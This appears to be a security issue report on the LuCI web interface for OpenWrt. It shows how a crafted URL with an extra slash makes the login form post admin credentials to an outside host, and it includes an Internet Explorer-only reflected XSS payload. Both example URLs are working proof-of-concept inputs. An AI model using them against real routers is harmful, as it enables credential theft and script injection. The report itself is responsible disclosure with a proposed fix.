Possible to change form post URL for the login page - potential leak of admin credentials

By adding an extra / after the beginning of that path the login form will submitted to a third party web site.

Example: http://192.168.56.2//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/

Resulting HTML: <form method="post" action="//httpbin.org/anything/…%2f…%2f/cgi-bin/luci/">

The URL is reflected in the response. An attacker can use this to trick an admin to submitting the username and password to an attacker-controlled website. Modern browsers will likely make this hard to exploit especially since #1343 was introduced.

A possible solution should be to make sure the form action URL always starts with a leading . before the first /.

Side note:

Another attack (XSS) that only works in Internet Explorer. http://192.168.56.2//192.168.56.2/..%2f/cgi-bin/luci/?iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii<script>alert(1)</script>

IE does not encode < and > in the query string (as opposed to FF/Chrome) and because the form is submitted from the same domain, the XSS filter in IE doesn’t block the XSS attack.

Verified on:

Powered by LuCI Master (git-18.088.49307-90ed423) / OpenWrt SNAPSHOT r6567-db893ec

Let me know if there is another preferred method of reporting security issues.